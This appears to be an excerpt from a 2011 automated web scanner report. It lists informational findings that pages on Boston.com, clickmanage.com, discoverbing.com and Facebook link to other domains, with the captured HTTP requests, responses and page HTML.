http://www.facebook.com/plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&layout=standard&show_faces=false&width=425&font=arial&colorscheme=light&ref=blogindex
http://www.legacy.com/BostonGlobe/DeathNotices.asp
http://www.omniture.com/
http://www.truste.org/ivalidate.php?url=www.boston.com&sealid=101
http://www.uclick.com/client/bos/el/?p1=Bottom_Plus_Horoscopes
https://bostonglobe.com/subscriber/offer/go/zip.asp?cd=WW015697&od=28

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Etag: 71649c45-ebf6-409f-85b6-7e83c3d59026
Content-Type: text/html;charset=UTF-8
Date: Tue, 19 Jul 2011 20:43:47 GMT
Set-Cookie: bcpage=9;expires=Wed, 22-Jun-2016 20:43:47 GMT;path=/;domain=boston.com;
Content-Length: 42969
Connection: Keep-Alive

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="eng">

<head>
<title
...[SNIP]...
<span id="gLogoSub"><a href="https://bostonglobe.com/subscriber/offer/go/zip.asp?cd=WW015697&od=28">Home Delivery</a>
...[SNIP]...
<li><a href="http://www.legacy.com/BostonGlobe/DeathNotices.asp" id="secnav_obituaries">Obituaries</a>
...[SNIP]...
</div>
                       <iframe id="fbLike" src="http://www.facebook.com/plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&layout=standard&show_faces=false&width=425&font=arial&colorscheme=light&ref=blogindex" scrolling="no" frameborder="0" allowTransparency="true" ></iframe>
...[SNIP]...
<li><iframe id="fbLike" src="http://www.facebook.com/plugins/like.php?href=http://www.boston.com/Boston/businessupdates/2011/07/state-street-announces-more-job-cuts/2Ah9Wno4Q7WHDubEEBBYLN/index.html&layout=standard&show_faces=false&width=190&font=arial&colorscheme=light&ref=blogent" scrolling="no" frameborder="0" allowTransparency="true" ></iframe>
...[SNIP]...
</ul>
           <script src="http://w.sharethis.com/button/sharethis.js#publisher=e1e0ea5a-a326-4731-b1d1-f21623043511&type=website&button=false" type="text/javascript"></script>
...[SNIP]...
<div align="center">
<a href="http://www.truste.org/ivalidate.php?url=www.boston.com&sealid=101"><img height="47" width="171" src="http://graphics.boston.com/images/registration/truste2007/TRUSTe_Certified_Privacy.gif" alt="TRUSTe Certified Privacy" />
...[SNIP]...
<div class="updateLink2">
       <a href="http://add.my.yahoo.com/rss?url=http://syndication.boston.com/business/ticker/index.xml">My Yahoo</a>
...[SNIP]...
<noscript><a href="http://www.omniture.com" title="Web Analytics"><img src="http://nytbglobe.112.2O7.net/b/ss/nytbglobe/1/H.19.3--NS/0" height="1" width="1" border="0" alt="" /></a>
...[SNIP]...
<li><a href="http://www.uclick.com/client/bos/el/?p1=Bottom_Plus_Horoscopes"
class="bold">Horoscopes</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.bostonglobe.com/advertiser/online/online.aspx?id=13052">Advertise</a>
...[SNIP]...
<li><a href="http://jobsearch.boston.monster.com/jobs/boston-globe-media+boston-globe+boston__2ecom_666?where=Boston__2C-MA&rad=10&sort=rv.dt&cy=us">Work here</a>
...[SNIP]...
<li class="first"><a rel="nofollow" href="http://bostonglobe.com/aboutus/contact_us/default.aspx">Contact The Boston Globe</a>
...[SNIP]...
<li><a href="http://bostonglobe.com/subscribers/homedelivery.aspx?id=5278">Subscribe</a>
...[SNIP]...
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/custserv.aspx?id=5274">Manage your subscription</a>
...[SNIP]...
<li><a href="http://bostonglobe.com/advertiser/default.aspx">Advertise</a>
...[SNIP]...
<li><a rel="nofollow" href="http://bostonglobe.com/subscribers/extras/index.aspx">The Boston Globe Extras</a>
...[SNIP]...
<li><a rel="nofollow" href="http://www.doriancolor.com/page3.html">The Boston Globe Gallery</a>
...[SNIP]...
<div>
   <img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-604060h&cg=0&cc=1&ts=noscript" width="1" height="1" alt="" />
   </div>
...[SNIP]...

20.58. http://www.clickmanage.com/events/clickevent.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.clickmanage.com
Path:	/events/clickevent.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://www.clickmanage.com/events/clickevent.aspx?ca=10332&e=4&l=1044996461&u=http%25253A%25252F%25252Fwww.numarasoftware.com%25252Fwelcome%25252Fservice_desk.aspx%25253Fsrc%25253Dgoogle%252526trm%25253Dissue_tracking_software&gclid=CIGmsIfNjaoCFct95QodzRHo0Q

The response contains the following link to another domain:

http://www.numarasoftware.com/welcome/service_desk.aspx?src=google&trm=issue_tracking_software

Request

GET /events/clickevent.aspx?ca=10332&e=4&l=1044996461&u=http%25253A%25252F%25252Fwww.numarasoftware.com%25252Fwelcome%25252Fservice_desk.aspx%25253Fsrc%25253Dgoogle%252526trm%25253Dissue_tracking_software&gclid=CIGmsIfNjaoCFct95QodzRHo0Q HTTP/1.1
Host: www.clickmanage.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

20.59. http://www.discoverbing.com/dbing/community.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.discoverbing.com
Path:	/dbing/community.axd

Issue detail

The page was loaded from a URL containing a query string:

http://www.discoverbing.com/dbing/community.axd?itemPath=/sitecore/content/Home/Community

The response contains the following links to other domains:

http://binged.it/mTtfAy
http://binged.it/nippna
http://binged.it/o8l1rd
http://binged.it/oLb8PP
http://binged.it/os8aLq
http://binged.it/qkLfBH
http://search.twitter.com/search?q=%23Carmageddon
http://search.twitter.com/search?q=%23HarryPotter
http://twitter.com/bing/statuses/93066979623178240
http://twitter.com/bing/statuses/93089279852552194
http://twitter.com/bing/statuses/93122292908961792
http://twitter.com/bing/statuses/93122812495138816
http://twitter.com/bing/statuses/93127195932897280
http://twitter.com/cabeautravel
http://twitter.com/driftingcowgirl
http://twitter.com/fareologist/statuses/93071318525812736
http://twitter.com/fareologist/statuses/93083728095621120
http://twitter.com/fareologist/statuses/93099710876893184
http://twitter.com/fareologist/statuses/93130006217232384
http://twitter.com/fareologist/statuses/93130335704973312
http://twitter.com/fastcompany
http://twitter.com/jlampert736
http://twitter.com/parinda
http://www.bing.com/community/Site_Blogs/b/search/archive/2011/06/08/bing-for-mobile-browse-gets-more-social.aspx
http://www.bing.com/community/Site_Blogs/b/search/archive/2011/06/29/photosynth-app-update-and-best-of-bing-maps-summer-xbox-amp-kinect-contest.aspx
http://www.bing.com/community/Site_Blogs/b/search/archive/2011/07/05/bing-for-ipad-update-searching-without-a-search-box.aspx
http://www.bing.com/community/Site_Blogs/b/search/archive/2011/07/18/it-s-not-too-late-to-book-great-summer-travel-deals-summer-fareology-update-from-bing.aspx
http://www.bing.com/community/Site_Blogs/b/webmaster/archive/2011/06/08/updates-to-bing-webmaster-tools-data-and-content.aspx

Request

GET /dbing/community.axd?itemPath=/sitecore/content/Home/Community HTTP/1.1
Host: www.discoverbing.com
Proxy-Connection: keep-alive
Referer: http://www.discoverbing.com/
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_nr=1307200261952; bingresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22DDINPROGRESS%22%2C%22url%22%3A%22http%253A//social.discoverbing.com/%22%2C%22timestamp%22%3A1307372850950%7D%2C%22lastinvited%22%3A1307372850950%2C%22userid%22%3A%221307361123212927392730955034%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5B%22p102855664%22%5D%7D; ASP.NET_SessionId=yln2iy45tia1yyebr32a2n55; dbingvisitnew=TRUE; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%22nSlUkQ8r7Lb%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2F%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_vnum=1313680622771%26vn%3D1; s_invisit=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 15:16:56 GMT
Content-Length: 5941

<div class="item twitter"><h4></h4><p><a href="http://twitter.com/cabeautravel">@cabeautravel</a>..Awesome! So glad you love!</p><p class='meta'>Posted by <a target='_blank' href='http://twitter.com/fareologist/statuses/93130335704973312'>@fareologist (Bing Travel)</a>
...[SNIP]...
<p><a href="http://twitter.com/parinda">@parinda</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/fareologist/statuses/93130006217232384'>@fareologist (Bing Travel)</a>
...[SNIP]...
<p>Ever wondered how we choose our daily homepage images? <a href="http://twitter.com/fastcompany">@fastcompany</a> gives the lowdown: <a href="http://binged.it/nippna">http://binged.it/nippna</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/bing/statuses/93127195932897280'>@bing (Bing)</a>
...[SNIP]...
<p><a href="http://twitter.com/jlampert736">@jlampert736</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/bing/statuses/93122812495138816'>@bing (Bing)</a>
...[SNIP]...
<p><a href="http://twitter.com/driftingcowgirl">@driftingcowgirl</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/bing/statuses/93122292908961792'>@bing (Bing)</a>
...[SNIP]...
<p>Tacky souvenirs? No way! Get cool stuff on every trip w/ this guide: <a href="http://binged.it/oLb8PP">http://binged.it/oLb8PP</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/fareologist/statuses/93099710876893184'>@fareologist (Bing Travel)</a>
...[SNIP]...
<p><a href="http://search.twitter.com/search?q=%23HarryPotter" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/intra/hashtag/#HarryPotter');">#HarryPotter</a> has best opening weekend ever. Surprised?<a href="http://binged.it/o8l1rd">http://binged.it/o8l1rd</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/bing/statuses/93089279852552194'>@bing (Bing)</a>
...[SNIP]...
<p>Like creepy tours? Us too. 12 Creepiest Abandoned Prisons on Earth to visit: <a href="http://binged.it/mTtfAy">http://binged.it/mTtfAy</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/fareologist/statuses/93083728095621120'>@fareologist (Bing Travel)</a>
...[SNIP]...
<p>Procrastinators ... don...t worry, we can help. Last minute flights (& cheap) are here: <a href="http://binged.it/qkLfBH">http://binged.it/qkLfBH</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/fareologist/statuses/93071318525812736'>@fareologist (Bing Travel)</a>
...[SNIP]...
<p><a href="http://search.twitter.com/search?q=%23Carmageddon" onclick="pageTracker._setCustomVar(2, 'result_type', 'recent', 3);pageTracker._trackPageview('/intra/hashtag/#Carmageddon');">#Carmageddon</a> is officially over. Order is restored in LA. Phew! <a href="http://binged.it/os8aLq">http://binged.it/os8aLq</a>
...[SNIP]...
<p class='meta'>Posted by <a target='_blank' href='http://twitter.com/bing/statuses/93066979623178240'>@bing (Bing)</a>
...[SNIP]...
<p><a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/07/18/it-s-not-too-late-to-book-great-summer-travel-deals-summer-fareology-update-from-bing.aspx' target='_blank'>It...s Not Too Late to Book Great Summer Travel Deals: Summer Fareology Update from Bing</a>
...[SNIP]...
<p class='meta'>Posted by <a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/07/18/it-s-not-too-late-to-book-great-summer-travel-deals-summer-fareology-update-from-bing.aspx' target='_blank'>The Bing Team</a>
...[SNIP]...
<p><a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/07/05/bing-for-ipad-update-searching-without-a-search-box.aspx' target='_blank'>Bing for iPad Update: Searching Without a Search Box</a>
...[SNIP]...
<p class='meta'>Posted by <a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/07/05/bing-for-ipad-update-searching-without-a-search-box.aspx' target='_blank'>The Bing Team</a>
...[SNIP]...
<p><a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/06/29/photosynth-app-update-and-best-of-bing-maps-summer-xbox-amp-kinect-contest.aspx' target='_blank'>Photosynth App Update and Best of Bing Maps Summer Xbox & Kinect Contest</a>
...[SNIP]...
<p class='meta'>Posted by <a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/06/29/photosynth-app-update-and-best-of-bing-maps-summer-xbox-amp-kinect-contest.aspx' target='_blank'>The Bing Team</a>
...[SNIP]...
<p><a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/06/08/bing-for-mobile-browse-gets-more-social.aspx' target='_blank'>Bing for Mobile Browse Gets More Social</a>
...[SNIP]...
<p class='meta'>Posted by <a href='http://www.bing.com/community/Site_Blogs/b/search/archive/2011/06/08/bing-for-mobile-browse-gets-more-social.aspx' target='_blank'>The Bing Team</a>
...[SNIP]...
<p><a href='http://www.bing.com/community/Site_Blogs/b/webmaster/archive/2011/06/08/updates-to-bing-webmaster-tools-data-and-content.aspx' target='_blank'>Updates to Bing Webmaster Tools, data and content.</a>
...[SNIP]...
<p class='meta'>Posted by <a href='http://www.bing.com/community/Site_Blogs/b/webmaster/archive/2011/06/08/updates-to-bing-webmaster-tools-data-and-content.aspx' target='_blank'>Duane Forrester</a>
...[SNIP]...

20.60. http://www.facebook.com/advertising/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/advertising/

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0

The response contains the following links to other domains:

http://ad.doubleclick.net/activity;src=2614082;type=landi584;cat=t3fba623;ord=1205391242?
http://ads.revsci.net/adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=788D060407632FEEC1CAF36849FCD437&rsi_site=5B0808D11C7842FEE1E62BF14D546420&rsi_event=4F8AC0F46333C645B9A6CF1F71CCA4D9
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/H9wnMF3Lri6.css
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/Q3Oe8zcURw5.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/lwKG0ViYlaK.css
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/2zvsC0zVzMB.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/PCqjbIZdno-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/AKFdbdR6W5B.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

20.61. http://www.facebook.com/ajax/intl/language_dialog.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/intl/language_dialog.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/ajax/intl/language_dialog.php?uri=http%3A%2F%2Fwww.facebook.com%2Fr.php

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css
http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png
http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/5fFMnagjg2S.css
http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml
http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico

Request

Response

HTTP/1.1 200 OK
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.111.31
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:23 GMT
Content-Length: 42761

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/ajax\/intl\/language_dialog.php";window._EagleEyeSeed="bq
...[SNIP]...
</noscript>
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yz/r/5fFMnagjg2S.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/8Wh3q4omJpY.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...
</script>
<link rel="search" type="application/opensearchdescription+xml" href="http://static.ak.fbcdn.net/rsrc.php/yJ/r/H2SSvhJMJA-.xml" title="Facebook" />
<link rel="shortcut icon" href="http://static.ak.fbcdn.net/rsrc.php/yi/r/q9U99v3_saj.ico" /></head>
...[SNIP]...
<a class="lfloat" href="/" title="Go to Facebook Home"><img class="fb_logo img" src="http://static.ak.fbcdn.net/rsrc.php/v1/yp/r/kk8dc2UJYJ4.png" alt="Facebook logo" width="170" height="36" /></a>
...[SNIP]...

20.62. http://www.facebook.com/ajax/prefetch.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/ajax/prefetch.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.facebook.com/ajax/prefetch.php?svn_rev=407015&tier=2

The response contains the following links to other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/-hUG5Dc8o3Z.css
http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/HHkUms5lcpx.css
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/2Cj0Ry1zsG6.css
http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/vTlzK_6DGwe.css
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/Mb-ySEi3O0b.css
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/r0jm6f8JtY2.css
http://static.ak.fbcdn.net/rsrc.php/v1/y1/r/rrdmptIcoxd.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/Q3Oe8zcURw5.css
http://static.ak.fbcdn.net/rsrc.php/v1/y3/r/sdwD1rGJXK2.css
http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/SK9j5prLTwj.css
http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/D-4QGnNagV6.css
http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/q30FbKmaBid.css
http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/zOMloODzDF_.css
http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/KZtmMbNS3_L.css
http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/ubbnH6M9ljE.css
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Dg8YLPWKyk7.css
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/SNrGdWeoQHs.css
http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/PVBa_VtP99O.css
http://static.ak.fbcdn.net/rsrc.php/v1/yA/r/C9intiNq_3N.css
http://static.ak.fbcdn.net/rsrc.php/v1/yB/r/PzNsk8U51ji.css
http://static.ak.fbcdn.net/rsrc.php/v1/yD/r/V-zkfHT8CXb.css
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/4F3Iv5NBJOL.css
http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/rwkuDRWV9jd.css
http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/sobEsVhahXR.css
http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/Bqaiy6eGUJa.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/87W0ancRJRW.css
http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/sHCa4y3LzLj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/_J12hr-nH-4.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/x_JdY7BNW9-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yI/r/z_rHQCDmDDh.css
http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/rSJeTgoHNUS.css
http://static.ak.fbcdn.net/rsrc.php/v1/yK/r/2oTj9mwQeS-.css
http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/a1RB0wRyoBD.css
http://static.ak.fbcdn.net/rsrc.php/v1/yM/r/HTDWQBuWGI8.css
http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/ur_c5XpT6zc.css
http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/O4MC2pFJMzJ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yO/r/j6Y0USeru-T.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/FnGB7tUxwE3.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/aBJXPgldonq.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/c6emPCFfPcn.css
http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/hkM0mPGHIE1.css
http://static.ak.fbcdn.net/rsrc.php/v1/yQ/r/KdKjGooM6-s.css
http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css
http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/JtYPs2Da_dw.css
http://static.ak.fbcdn.net/rsrc.php/v1/yX/r/NE1qNsIIHmi.css
http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/zpzCcjhbyCZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/DZLa1PZIieN.css
http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/NGblq-c7mGZ.css
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/K_RxgTvVokq.css
http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/edfMk-9nmKj.css
http://static.ak.fbcdn.net/rsrc.php/v1/yh/r/uYvCnbsceoH.css
http://static.ak.fbcdn.net/rsrc.php/v1/yi/r/erCj3jAAsca.css
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/DiI7ZwzsMWE.css
http://static.ak.fbcdn.net/rsrc.php/v1/ym/r/OFPuB9qmfib.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/Rgx_Vz7nSNo.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/heGhkAidtX0.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/msTi-EL7vCK.css
http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/otNsMnT3Ccb.css
http://static.ak.fbcdn.net/rsrc.php/v1/yr/r/Ci-JcEcsrg9.css
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css
http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/qirUjHNG9oJ.css
http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/JDZvhitRmkG.css
http://static.ak.fbcdn.net/rsrc.php/v1/yu/r/7f4SE3bv4B2.css
http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/SYIMzW6wi61.css
http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/bDUZuV99E60.css
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/POIirpFgl5q.css
http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/Trz9qEKGISz.css

Request

GET /ajax/prefetch.php?svn_rev=407015&tier=2 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/terms.php?ref=pf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fhelp%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: public,max-age=31536000
Content-Type: text/html;charset=utf-8
Expires: Wed, 18 Jul 2012 15:01:02 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
X-FB-Server: 10.62.99.40
X-Cnection: close
Date: Tue, 19 Jul 2011 15:01:02 GMT
Content-Length: 7354

<!DOCTYPE html><html><head><script>document.domain = 'facebook.com';</script><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yL/r/a1RB0wRyoBD.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/q30FbKmaBid.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/SNrGdWeoQHs.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yJ/r/rSJeTgoHNUS.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/SK9j5prLTwj.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yP/r/aBJXPgldonq.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yc/r/NGblq-c7mGZ.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/NoGBEHOl3Wf.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/D-4QGnNagV6.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yH/r/87W0ancRJRW.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/KZtmMbNS3_L.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/bDUZuV99E60.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yR/r/bQKCJas2cuT.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yE/r/rwkuDRWV9jd.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/JDZvhitRmkG.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y0/r/2Cj0Ry1zsG6.css" /><link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/JtYPs2Da_dw.css" /><link type="text/css" rel="stylesheet" 